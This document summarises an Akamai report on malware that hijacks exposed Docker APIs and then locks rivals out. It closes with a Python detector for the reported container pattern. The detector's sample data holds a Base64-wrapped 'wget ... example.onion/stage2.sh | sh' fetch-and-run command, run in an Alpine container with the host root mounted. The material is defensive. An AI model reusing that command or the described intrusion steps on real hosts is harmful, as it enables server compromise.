Overview
- Akamai reports a new variant targeting internet-exposed Docker APIs that blocks outside access to the API after compromise to keep rivals out.
- The attack launches a container from a modified Alpine image, mounts the host filesystem, runs a Base64 command, and pulls a second-stage script from a Tor .onion service.
- Persistence is installed by adding an attacker SSH key and a cron job that repeatedly enforces firewall rules to close port 2375, while tools like masscan, torsocks, zstd, and libpcap are deployed.
- A Go-based dropper scans for other exposed Docker APIs and replicates the intrusion, removing competitor containers, particularly Ubuntu-based ones that are often used for cryptomining.
- Researchers note dormant code paths for Telnet (port 23) and Chrome remote debugging (port 9222), Tor-backed distribution, IOCs published from honeypot observations, and an emoji left in the source that may hint at LLM-assisted development.
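A defender-side check for the container-launch pattern summarised above (Alpine image, host filesystem bind-mounted, Base64-decoded command, second stage fetched from a .onion service), added here as an illustrative example that is not part of Akamai's report. The `docker inspect` sample and the `example.onion` address are constructed placeholders.

```python
"""Flag containers whose launch configuration matches the reported Docker API abuse chain."""
import base64
import json
import re

# Constructed placeholder for the Base64-wrapped stage-2 fetch described in the report.
STAGE2_B64 = base64.b64encode(b"wget -qO- http://example.onion/stage2.sh | sh").decode()

# Constructed minimal subset of `docker inspect` output: one benign and one suspicious container.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/web-app",
        "Config": {"Image": "nginx:1.27", "Cmd": ["nginx", "-g", "daemon off;"]},
        "Mounts": [{"Type": "volume", "Source": "app_data", "Destination": "/usr/share/nginx/html"}],
    },
    {
        "Name": "/alpine_worker",
        "Config": {"Image": "alpine:3.20", "Cmd": ["sh", "-c", f"echo {STAGE2_B64} | base64 -d | sh"]},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/hostroot"}],
    },
])


def base64_payloads(cmd):
    """Decode any Base64-looking tokens in a command vector; undecodable tokens are skipped."""
    decoded = []
    for tok in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", " ".join(cmd)):
        try:
            decoded.append(base64.b64decode(tok, validate=True).decode("utf-8", "replace"))
        except (ValueError, UnicodeDecodeError):
            pass
    return decoded


def suspicious_containers(inspect_json):
    """Return {container_name: [reasons]} for containers matching the intrusion pattern."""
    findings = {}
    for c in json.loads(inspect_json):
        reasons = []
        cmd = c.get("Config", {}).get("Cmd") or []
        if any(m.get("Type") == "bind" and m.get("Source") == "/" for m in c.get("Mounts", [])):
            reasons.append("host root filesystem bind-mounted")
        if any("base64" in t for t in cmd):
            reasons.append("command decodes base64 at runtime")
        if any(".onion" in d for d in base64_payloads(cmd)):
            reasons.append("decoded payload references a Tor .onion address")
        if reasons:
            findings[c["Name"]] = reasons
    return findings
```

Running `suspicious_containers(SAMPLE_INSPECT)` flags only `/alpine_worker`; feeding it real `docker inspect $(docker ps -q)` output works the same way because only the `Name`, `Config.Cmd` and `Mounts` fields are read.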